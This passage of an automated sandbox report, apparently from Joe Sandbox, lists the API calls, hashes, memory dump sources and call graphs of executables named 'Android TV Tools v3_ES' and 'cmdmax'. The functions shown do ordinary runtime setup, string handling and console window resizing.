                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: CountTick$Sleep
                        • String ID: vJ@
                        • API String ID: 4250438611-3547802607
                        • Opcode ID: 28b246be3bc00e080162425e568454d690fb55889d731836eae1020fd3b864f0
                        • Instruction ID: 49849d38280906807e8ee4edd28df9028b76a086347d3e99f882293cb68a1183
                        • Opcode Fuzzy Hash: 28b246be3bc00e080162425e568454d690fb55889d731836eae1020fd3b864f0
                        • Instruction Fuzzy Hash: 89E0E6B494410CEBD7009FD4E61965CBB74AF44305F1041A6E90DA2150C7759605966D
                        Function 00407F1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32(KERNEL32,00405EFC), ref: 00407F21
                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00407F31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: IsProcessorFeaturePresent$KERNEL32
                        • API String ID: 1646373207-3105848591
                        • Opcode ID: 801503ef7e27cf9a43a024029164bff861d2c6805bca75d3ab28725c527fc555
                        • Instruction ID: e56adbcfc5baa1e8a41b4ee712c6b816f41ba93bc4bb42817cd1dab545e2ce80
                        • Opcode Fuzzy Hash: 801503ef7e27cf9a43a024029164bff861d2c6805bca75d3ab28725c527fc555
                        • Instruction Fuzzy Hash: 5CC01230FCC30267DA202BF24D09B1628081B40B42F2040F6A209F60D4CE78E80A802E
                        Function 0040B9A7 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00000000,00000000,00000000,?,00406910,00000000,?,00000000,?), ref: 0040B9D6
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,00000000,?,00406910,00000000,?,00000000,?), ref: 0040B9E9
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,00406910,00000000,?,00000000,?), ref: 0040BA35
                        • CompareStringW.KERNEL32(?,004055BA,00000000,00000000,?,00000000,?,00000000,?,00406910,00000000,?,00000000,?), ref: 0040BA4D
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$CompareString
                        • String ID:
                        • API String ID: 376665442-0
                        • Opcode ID: e230329e4d0f1b617e8e9b9b07688b33fe91b266f24df33c89f9663b5fb6963c
                        • Instruction ID: 70f0504ceda5a75237d31f75ca127f3a46736c60405e54fa0e2596185df07c21
                        • Opcode Fuzzy Hash: e230329e4d0f1b617e8e9b9b07688b33fe91b266f24df33c89f9663b5fb6963c
                        • Instruction Fuzzy Hash: 8A21E632D00249ABCF219F848D45ADE7FB5FB48360F10812AFA14721A0D3369A619B98
                        Function 0040B4A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                        Download Yara Rule
                        APIs
                        • GetCPInfo.KERNEL32(?,00000000), ref: 0040B4B4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: Info
                        • String ID: $
                        • API String ID: 1807457897-3032137957
                        • Opcode ID: b27c5241f401bb9353d1679f267d54306c1b93cc1f0b37af77394cc5f842b60e
                        • Instruction ID: 3ed02c847eb8ff4f8ce161b6e6d196eebb5d09d3f5d5ded90353173e0599949d
                        • Opcode Fuzzy Hash: b27c5241f401bb9353d1679f267d54306c1b93cc1f0b37af77394cc5f842b60e
                        • Instruction Fuzzy Hash: 90415A3100425C2AEB128794DD9ABF77F99EB05708F1808F6D545E62D2C3794904EBFE

                        Execution Graph

                        Execution Coverage:9.5%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:436
                        Total number of Limit Nodes:4
                        execution_graph 1693 402780 1696 40279d 1693->1696 1694 4027f2 ExitProcess 1695 4027fd 1696->1694 1696->1695 1697 401770 GetVersion 1716 403670 HeapCreate 1697->1716 1699 4017cc 1717 403490 1699->1717 1701 4017d8 1731 403480 1701->1731 1705 4017ed 1706 401806 1705->1706 1809 402740 1705->1809 1762 402da0 GetModuleFileNameA 1706->1762 1709 40180e 1768 402cc0 1709->1768 1711 401813 1779 401091 1711->1779 1714 402740 ExitProcess 1715 40183d 1714->1715 1716->1699 1812 403ea0 1717->1812 1720 4034b1 GetStartupInfoA 1724 4035d8 1720->1724 1730 40350a 1720->1730 1723 40360d GetStdHandle 1723->1724 1725 403617 GetFileType 1723->1725 1724->1723 1726 40364f SetHandleCount 1724->1726 1725->1724 1726->1701 1727 403ea0 HeapAlloc 1727->1730 1728 4035a5 GetFileType 1729 40358b 1728->1729 1729->1724 1729->1728 1730->1724 1730->1727 1730->1729 1730->1730 1851 4031c0 1731->1851 1733 4017dd GetCommandLineA 1734 403020 1733->1734 1735 403030 GetEnvironmentStringsW 1734->1735 1738 40303e 1734->1738 1736 40304e GetEnvironmentStrings 1735->1736 1735->1738 1737 403066 1736->1737 1736->1738 1737->1705 1739 40308b 1738->1739 1740 40312d 1738->1740 1741 4030a1 WideCharToMultiByte 1739->1741 1742 40308f GetEnvironmentStringsW 1739->1742 1743 4031b1 1740->1743 1745 403150 1740->1745 1746 40313a GetEnvironmentStrings 1740->1746 1749 4030db 1741->1749 1750 40311c FreeEnvironmentStringsW 1741->1750 1742->1741 1744 403097 1742->1744 1743->1705 1744->1705 1751 403ea0 HeapAlloc 1745->1751 1746->1745 1748 403146 1746->1748 1748->1705 1752 403ea0 HeapAlloc 1749->1752 1750->1705 1753 40316e 1751->1753 1754 4030e1 1752->1754 1755 403179 FreeEnvironmentStringsA 1753->1755 1756 40318a FreeEnvironmentStringsA 1753->1756 1754->1750 1757 4030ea WideCharToMultiByte 1754->1757 1755->1705 1756->1705 1758 403100 1757->1758 1759 40310b FreeEnvironmentStringsW 1757->1759 1862 404b20 1758->1862 1759->1705 1763 402dc8 1762->1763 1764 403ea0 HeapAlloc 1763->1764 1765 402df6 1764->1765 1766 401880 7 API calls 1765->1766 1767 402e06 1765->1767 1766->1767 1767->1709 1769 402cd4 1768->1769 1770 403ea0 HeapAlloc 1769->1770 1771 402cfb 1770->1771 1773 401880 7 API calls 1771->1773 1777 402d10 1771->1777 1772 402d7f 1774 404b20 HeapFree 1772->1774 1773->1777 1776 402d8a 1774->1776 1775 403ea0 HeapAlloc 1775->1777 1776->1711 1777->1772 1777->1775 1778 401880 7 API calls 1777->1778 1778->1777 1780 4010ae 1779->1780 1781 4010de GetModuleHandleA GetProcAddress 1780->1781 1782 401114 GetStdHandle 1781->1782 1783 40110a 1781->1783 1784 401178 1782->1784 1785 401129 GetLargestConsoleWindowSize 1782->1785 1783->1782 1786 401182 1784->1786 1787 40127c 1784->1787 1808 401212 1785->1808 1871 4014a0 1786->1871 1874 4013c0 1787->1874 1794 4014a0 19 API calls 1799 4011a9 1794->1799 1795 4012d0 1797 4012fc SetConsoleScreenBufferSize SetConsoleWindowInfo SetConsoleScreenBufferSize SetConsoleWindowInfo 1795->1797 1798 4012dd GetConsoleWindow SetWindowPos 1795->1798 1796 4013c0 7 API calls 1796->1795 1800 40133f 1797->1800 1798->1797 1801 4014a0 19 API calls 1799->1801 1800->1714 1802 4011cc 1801->1802 1803 4014a0 19 API calls 1802->1803 1804 4011e3 1803->1804 1805 4014a0 19 API calls 1804->1805 1806 4011fa 1805->1806 1807 4014a0 19 API calls 1806->1807 1807->1808 1865 401400 1808->1865 2097 402780 1809->2097 1821 403ec0 1812->1821 1814 4034a1 1814->1720 1815 401880 1814->1815 1816 401889 1815->1816 1817 40188e 1815->1817 1828 403770 1816->1828 1834 4037b0 1817->1834 1820 401898 1820->1720 1822 403ed0 1821->1822 1823 403ecb 1821->1823 1826 403ed4 1822->1826 1823->1814 1825 403efb 1825->1814 1826->1825 1827 403f00 HeapAlloc 1826->1827 1827->1826 1829 40377a 1828->1829 1830 4037b0 7 API calls 1829->1830 1833 4037a9 1829->1833 1831 403791 1830->1831 1832 4037b0 7 API calls 1831->1832 1832->1833 1833->1817 1837 4037c8 1834->1837 1835 403993 1835->1820 1836 403958 1839 403965 GetStdHandle 1836->1839 1840 40396f WriteFile 1836->1840 1837->1835 1837->1836 1838 40380f 1837->1838 1838->1835 1841 40381b GetModuleFileNameA 1838->1841 1839->1840 1840->1835 1842 403836 1841->1842 1845 404b40 1842->1845 1844 40394a 1844->1820 1846 404b4d LoadLibraryA 1845->1846 1850 404b8f 1845->1850 1847 404bcc 1846->1847 1848 404b5e GetProcAddress 1846->1848 1847->1844 1848->1847 1849 404b75 GetProcAddress GetProcAddress 1848->1849 1849->1850 1850->1844 1857 4033a0 1851->1857 1854 40321e GetCPInfo 1856 403233 1854->1856 1855 4031de 1855->1733 1856->1733 1858 4033c3 1857->1858 1859 4033b3 GetOEMCP 1857->1859 1860 4031d1 1858->1860 1861 4033c8 GetACP 1858->1861 1859->1858 1860->1854 1860->1855 1861->1860 1863 403106 1862->1863 1864 404b28 HeapFree 1862->1864 1863->1759 1864->1863 1866 40140e 1865->1866 1869 40141c 1865->1869 1866->1869 1886 402820 1866->1886 1868 40129b 1868->1795 1868->1796 1869->1868 1881 4026d0 1869->1881 1983 4014c0 1871->1983 2059 4024f0 1874->2059 1880 401286 ExitProcess 1882 4026d8 1881->1882 1883 4026db 1881->1883 1882->1869 1895 404140 1883->1895 1885 4026fa 1885->1869 1890 402885 1886->1890 1893 40282f 1886->1893 1887 402835 WideCharToMultiByte 1888 40288c 1887->1888 1887->1893 1888->1869 1889 403ea0 HeapAlloc 1889->1893 1890->1869 1891 40285d WideCharToMultiByte 1892 4028a0 1891->1892 1891->1893 1892->1869 1893->1887 1893->1889 1893->1890 1893->1891 1924 404460 1893->1924 1896 404150 CompareStringA 1895->1896 1899 40416c 1895->1899 1897 404190 CompareStringW 1896->1897 1896->1899 1898 4041b8 1897->1898 1897->1899 1898->1885 1900 4041ed CompareStringA 1899->1900 1904 404209 1899->1904 1900->1885 1901 40433a MultiByteToWideChar 1902 404355 1901->1902 1903 40435f 1901->1903 1902->1885 1905 403ea0 HeapAlloc 1903->1905 1904->1901 1906 404270 GetCPInfo 1904->1906 1907 40423f 1904->1907 1908 40436b 1905->1908 1909 404284 1906->1909 1910 40428e 1906->1910 1907->1885 1911 404380 MultiByteToWideChar 1908->1911 1912 404376 1908->1912 1909->1885 1910->1901 1923 404292 1910->1923 1913 404407 1911->1913 1914 40439d MultiByteToWideChar 1911->1914 1912->1885 1915 404b20 HeapFree 1913->1915 1914->1913 1916 4043b6 1914->1916 1917 404411 1915->1917 1918 403ea0 HeapAlloc 1916->1918 1919 404b20 HeapFree 1917->1919 1920 4043c3 1918->1920 1919->1907 1920->1913 1921 4043ce MultiByteToWideChar 1920->1921 1921->1913 1922 4043e3 CompareStringW 1921->1922 1922->1913 1923->1885 1925 4046a3 1924->1925 1926 404472 1924->1926 1925->1893 1926->1925 1927 4044ba 1926->1927 1954 404710 1926->1954 1929 4044e4 1927->1929 1930 4044f9 1927->1930 1932 4044df 1927->1932 1942 4044ec 1929->1942 1963 4046b0 1929->1963 1934 404500 1930->1934 1937 40451a 1930->1937 1940 403ea0 HeapAlloc 1930->1940 1935 402820 21 API calls 1932->1935 1933 404587 1936 4045da 1933->1936 1939 404595 1933->1939 1934->1893 1935->1929 1938 404699 1936->1938 1944 404e80 3 API calls 1936->1944 1937->1929 1941 403ea0 HeapAlloc 1937->1941 1943 404526 1937->1943 1938->1893 1945 404b20 HeapFree 1939->1945 1952 4045c8 1939->1952 1940->1937 1941->1929 1942->1893 1943->1893 1944->1952 1946 4045a7 1945->1946 1968 404e80 1946->1968 1947 403ea0 HeapAlloc 1950 40463f 1947->1950 1948 404600 1948->1893 1950->1948 1951 404648 SetEnvironmentVariableA 1950->1951 1953 404b20 HeapFree 1951->1953 1952->1947 1952->1948 1953->1948 1955 404723 1954->1955 1956 40471d 1954->1956 1957 403ea0 HeapAlloc 1955->1957 1956->1927 1958 404743 1957->1958 1959 401880 7 API calls 1958->1959 1961 404755 1958->1961 1959->1961 1960 404778 1960->1927 1961->1960 1979 404f80 1961->1979 1964 4046ec 1963->1964 1966 4046be 1963->1966 1964->1933 1965 4026d0 11 API calls 1965->1966 1966->1964 1966->1965 1967 4046fd 1966->1967 1967->1933 1969 404e9c 1968->1969 1970 404e8f 1968->1970 1972 404ea0 1969->1972 1978 404eaf 1969->1978 1971 403ea0 HeapAlloc 1970->1971 1973 404e95 1971->1973 1974 404b20 HeapFree 1972->1974 1973->1952 1976 404ea6 1974->1976 1975 404ec3 HeapReAlloc 1975->1978 1976->1952 1977 404ee9 1977->1952 1978->1975 1978->1977 1980 404f8d 1979->1980 1981 403ea0 HeapAlloc 1980->1981 1982 404f95 1981->1982 1982->1961 1985 4014d7 1983->1985 1987 40150c 1985->1987 1990 4029a0 1985->1990 1986 4029a0 8 API calls 1986->1987 1987->1986 1989 401192 1987->1989 1995 4028b0 1987->1995 1989->1794 1991 4029b2 1990->1991 1992 4029c7 1990->1992 1991->1985 2003 4049f0 1992->2003 1994 402a11 1994->1985 1996 4028c1 1995->1996 1997 4028d5 1995->1997 1996->1987 1998 4028ee 1997->1998 1999 4029a0 8 API calls 1997->1999 2001 402906 1998->2001 2024 404790 1998->2024 1999->1998 2001->1987 2002 402961 2002->1987 2004 404a00 GetStringTypeA 2003->2004 2005 404a1c 2003->2005 2004->2005 2006 404a23 GetStringTypeW 2004->2006 2008 404a89 2005->2008 2009 404a5c GetStringTypeA 2005->2009 2006->2005 2007 404a42 2006->2007 2007->1994 2011 404aa5 MultiByteToWideChar 2008->2011 2016 404b06 2008->2016 2009->1994 2012 404b00 2011->2012 2013 404ac2 2011->2013 2014 404b20 HeapFree 2012->2014 2020 404060 2013->2020 2014->2016 2016->1994 2018 404ad3 MultiByteToWideChar 2018->2012 2019 404aec GetStringTypeW 2018->2019 2019->2012 2021 40406f 2020->2021 2022 404088 HeapAlloc 2021->2022 2023 4040ad 2021->2023 2022->2021 2023->2012 2023->2018 2025 40479d LCMapStringA 2024->2025 2028 4047bb 2024->2028 2026 4047c2 LCMapStringW 2025->2026 2025->2028 2027 4047e5 2026->2027 2026->2028 2027->2002 2029 40481e LCMapStringA 2028->2029 2030 40483f 2028->2030 2029->2002 2031 40485e MultiByteToWideChar 2030->2031 2047 40491a 2030->2047 2032 404882 2031->2032 2033 40487b 2031->2033 2034 403ea0 HeapAlloc 2032->2034 2033->2002 2035 40488f 2034->2035 2036 404898 2035->2036 2037 40489f MultiByteToWideChar 2035->2037 2036->2002 2038 4048b8 LCMapStringW 2037->2038 2058 40490b 2037->2058 2040 4048d4 2038->2040 2038->2058 2039 404b20 HeapFree 2041 404911 2039->2041 2042 404924 2040->2042 2043 4048db 2040->2043 2044 404b20 HeapFree 2041->2044 2045 403ea0 HeapAlloc 2042->2045 2046 4049a2 2043->2046 2050 4048eb LCMapStringW 2043->2050 2043->2058 2044->2047 2048 404931 2045->2048 2049 404b20 HeapFree 2046->2049 2047->2002 2051 40493a LCMapStringW 2048->2051 2048->2058 2052 4049a8 2049->2052 2050->2046 2050->2058 2054 404952 2051->2054 2051->2058 2053 404b20 HeapFree 2052->2053 2055 4049b1 2053->2055 2056 40497e WideCharToMultiByte 2054->2056 2057 40495e WideCharToMultiByte 2054->2057 2055->2002 2056->2046 2056->2058 2057->2046 2057->2058 2058->2039 2060 4024ff 2059->2060 2061 403ea0 HeapAlloc 2060->2061 2062 4013cc 2060->2062 2061->2062 2063 401a00 2062->2063 2064 4013e5 2063->2064 2069 401a32 __aulldiv __aullrem 2063->2069 2070 402590 2064->2070 2065 4023e0 6 API calls 2065->2069 2066 402470 6 API calls 2066->2069 2067 403d10 WideCharToMultiByte 2067->2069 2068 402430 6 API calls 2068->2069 2069->2064 2069->2065 2069->2066 2069->2067 2069->2068 2071 4025c8 2070->2071 2072 40259c 2070->2072 2074 403f70 5 API calls 2071->2074 2076 4025d4 2071->2076 2072->2076 2077 403f70 2072->2077 2074->2076 2076->1880 2078 403f86 2077->2078 2080 4025a8 2077->2080 2078->2080 2081 4039a0 2078->2081 2080->1880 2082 4039fc 2081->2082 2084 4039ba 2081->2084 2082->2080 2083 403a17 2085 403ab6 WriteFile 2083->2085 2086 403a2e 2083->2086 2084->2082 2084->2083 2091 403bd0 2084->2091 2088 403ae5 GetLastError 2085->2088 2090 403ab4 2085->2090 2089 403a7d WriteFile 2086->2089 2086->2090 2088->2090 2089->2086 2089->2088 2090->2080 2092 403be3 2091->2092 2093 403c14 2091->2093 2092->2093 2094 403c27 SetFilePointer 2092->2094 2093->2083 2095 403c46 GetLastError 2094->2095 2096 403c4c 2094->2096 2095->2096 2096->2083 2100 40279d 2097->2100 2098 4027f2 ExitProcess 2099 40274e 2099->1706 2100->2098 2100->2099 2101 401000 GetCurrentProcessId 2107 401350 2101->2107 2103 40103a SetConsoleTitleA 2104 40104a Sleep FindWindowA 2103->2104 2105 401084 2104->2105 2106 401074 2104->2106 2106->2104 2106->2105 2108 401a00 7 API calls 2107->2108 2109 401384 2108->2109 2110 40138f 2109->2110 2113 4018b0 2109->2113 2110->2103 2112 4013ad 2112->2103 2114 401964 2113->2114 2115 4018c6 2113->2115 2114->2112 2115->2114 2123 401931 2115->2123 2126 403c90 2115->2126 2116 4019b2 2118 4039a0 5 API calls 2116->2118 2117 40193d 2119 401952 2117->2119 2120 401974 2117->2120 2124 40195d 2118->2124 2122 4039a0 5 API calls 2119->2122 2120->2124 2125 403bd0 2 API calls 2120->2125 2122->2124 2123->2116 2123->2117 2124->2112 2125->2124 2127 403ea0 HeapAlloc 2126->2127 2128 403ca5 2127->2128 2128->2123 2129 404d60 2130 401880 7 API calls 2129->2130 2131 404d67 2130->2131 2146 403690 2147 403722 2146->2147 2148 4036ae 2146->2148 2148->2147 2149 402a34 RtlUnwind 2148->2149 2149->2148 2150 4026b0 2156 403fe0 2150->2156 2152 4026c3 2153 4026b5 2153->2152 2155 404b20 HeapFree 2153->2155 2159 404e10 2153->2159 2155->2153 2170 403ff0 2156->2170 2160 404e22 2159->2160 2161 404e2e 2159->2161 2160->2153 2162 403f70 5 API calls 2161->2162 2169 404e56 2161->2169 2163 404e38 2162->2163 2174 4051d0 2163->2174 2167 404e4f 2168 404b20 HeapFree 2167->2168 2167->2169 2168->2169 2169->2153 2173 403ffe 2170->2173 2171 403fe7 2171->2153 2172 403f20 7 API calls 2172->2173 2173->2171 2173->2172 2175 404e43 2174->2175 2176 4051dc 2174->2176 2178 405100 2175->2178 2176->2175 2177 404b20 HeapFree 2176->2177 2177->2175 2179 4051a9 2178->2179 2180 405114 2178->2180 2179->2167 2180->2179 2181 405161 CloseHandle 2180->2181 2183 405179 2180->2183 2182 40516f GetLastError 2181->2182 2181->2183 2182->2183 2186 404c80 2183->2186 2185 405181 2185->2167 2188 404c8e 2186->2188 2189 404cce 2186->2189 2187 404ce0 SetStdHandle 2187->2189 2188->2187 2188->2189 2189->2185 2132 4025e7 2133 4025ea 2132->2133 2134 404060 HeapAlloc 2133->2134 2135 402616 2134->2135 2136 404060 HeapAlloc 2135->2136 2138 402648 2135->2138 2137 402635 2136->2137 2137->2138 2139 401880 7 API calls 2137->2139 2139->2138 2140 403688 2143 403690 2140->2143 2141 403722 2143->2141 2144 402a34 RtlUnwind 2143->2144 2145 402a4c 2144->2145 2145->2143 2190 40185a 2193 402760 2190->2193 2194 402780 ExitProcess 2193->2194 2195 401866 2194->2195 2196 40183f 2199 402b30 2196->2199 2198 401856 2200 402b3c 2199->2200 2201 402c81 UnhandledExceptionFilter 2200->2201 2202 402b52 2200->2202 2201->2198 2202->2198

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_00404140 44 Function_00404B20 0->44 45 Function_00404430 0->45 94 Function_00403EA0 0->94 1 Function_00402E40 2 Function_00404B40 3 Function_00402740 75 Function_00402780 3->75 4 Function_00402A4C 5 Function_0040374D 22 Function_00402A76 5->22 6 Function_0040504D 7 Function_00403450 8 Function_00401350 27 Function_00401A00 8->27 103 Function_004018B0 8->103 9 Function_00402A54 10 Function_00405059 11 Function_0040185A 15 Function_00402760 11->15 12 Function_00404460 35 Function_00404710 12->35 43 Function_00402820 12->43 12->44 70 Function_00404EF0 12->70 80 Function_00404E80 12->80 12->94 107 Function_004046B0 12->107 13 Function_00404060 19 Function_00404D70 13->19 14 Function_00404D60 77 Function_00401880 14->77 15->75 16 Function_00403670 17 Function_00403F70 93 Function_004039A0 17->93 18 Function_00401770 18->3 18->16 37 Function_00402710 18->37 41 Function_00403020 18->41 52 Function_00402CC0 18->52 76 Function_00403480 18->76 84 Function_00403490 18->84 88 Function_00401091 18->88 90 Function_00402DA0 18->90 20 Function_00403770 99 Function_004037B0 20->99 21 Function_00402470 66 Function_004023E0 21->66 30 Function_00402B0A 22->30 23 Function_00403F00 24 Function_00405100 31 Function_00404C10 24->31 34 Function_00404D10 24->34 79 Function_00404C80 24->79 25 Function_00401000 25->8 26 Function_00402800 27->21 32 Function_00403D10 27->32 40 Function_00403E20 27->40 48 Function_00402430 27->48 53 Function_004024C0 27->53 27->66 67 Function_004024E0 27->67 104 Function_004024B0 27->104 105 Function_00403DB0 27->105 28 Function_00401400 28->43 60 Function_004026D0 28->60 29 Function_00402B01 33 Function_00404E10 33->17 33->24 33->44 62 Function_004051D0 33->62 35->77 78 Function_00404F80 35->78 35->94 36 Function_00405210 37->26 38 Function_00401710 39 Function_00405019 41->44 41->94 42 Function_00403F20 42->17 73 Function_00403FF0 42->73 95 Function_00404DA0 42->95 43->12 43->94 46 Function_00405230 47 Function_00402B30 85 Function_00402C90 47->85 48->66 49 Function_00402A34 50 Function_0040343C 51 Function_0040183F 51->47 52->44 52->77 52->94 54 Function_004031C0 54->7 71 Function_004033F0 54->71 89 Function_004033A0 54->89 55 Function_00403EC0 55->19 55->23 56 Function_004049C0 57 Function_004014C0 91 Function_004029A0 57->91 106 Function_004028B0 57->106 58 Function_004013C0 58->27 72 Function_004024F0 58->72 87 Function_00402590 58->87 59 Function_004050C6 60->0 61 Function_00403BD0 61->31 61->34 62->44 63 Function_00402ADE 64 Function_00404BE0 65 Function_00403CE0 66->103 68 Function_00403FE0 68->73 69 Function_004025E7 69->13 69->77 70->36 72->65 72->94 73->42 74 Function_004049F0 74->13 74->44 75->26 76->54 77->20 77->99 78->46 78->94 102 Function_004052B0 78->102 80->19 80->44 80->94 81 Function_00403688 81->22 81->30 81->49 82 Function_00404790 82->44 82->56 82->94 83 Function_00403690 83->22 83->30 83->49 84->77 84->94 86 Function_00403C90 86->94 87->17 88->28 88->38 88->58 92 Function_004014A0 88->92 90->1 90->77 90->94 91->74 92->57 93->31 93->61 94->55 95->34 96 Function_004053A0 97 Function_004050A6 98 Function_004023A8 99->2 99->64 100 Function_004026B0 100->33 100->44 100->68 101 Function_00404FB0 103->61 103->65 103->86 103->93 106->82 106->91 107->60 108 Function_004052B8

                        Executed Functions

                        Function 00401091 Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 213libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 004010EB
                        • GetProcAddress.KERNEL32(00000000), ref: 004010F2
                        • GetStdHandle.KERNEL32(000000F5), ref: 00401116
                        • GetLargestConsoleWindowSize.KERNEL32(00000001), ref: 0040112D
                        • ExitProcess.KERNEL32 ref: 0040128B
                        • GetConsoleWindow.KERNELBASE(00000000,?,?,00000000,00000000,00000001), ref: 004012EF
                        • SetWindowPos.USER32(00000000), ref: 004012F6
                        • SetConsoleScreenBufferSize.KERNELBASE(00000007,8U), ref: 00401304
                        • SetConsoleWindowInfo.KERNELBASE(00000007,00000001,00000000), ref: 00401314
                        • SetConsoleScreenBufferSize.KERNELBASE(00000007,8U), ref: 00401322
                        • SetConsoleWindowInfo.KERNELBASE(00000007,00000001,00000000), ref: 00401332
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: Console$Window$Size$BufferHandleInfoScreen$AddressExitLargestModuleProcProcess
                        • String ID: %d %d %d %d %d %d$8U$CMDMAX_DEBUG$GetConsoleWindow$Usage: cmdmax [<pos_x> <pos_y> <win_w> <win_h> <buf_w> <buf_h>] pos_x, pos_y are in pixels win_w, win_h, buf_w, buf_h are in characters buf_w, buf_h must be greater or equal to win_w, win_h if both pos_x, pos_y are set to letter 'n'$kernel32.dll
                        • API String ID: 3954929148-753699543
                        • Opcode ID: 51c1bba1868696b56766017a525fd275070f8669f06dd8a5ee0a9d837f02c277
                        • Instruction ID: 8c665b8b8e7dd296a86b3b68ad36f009cdc48b0ece15f37bffc1b1e9df652cec
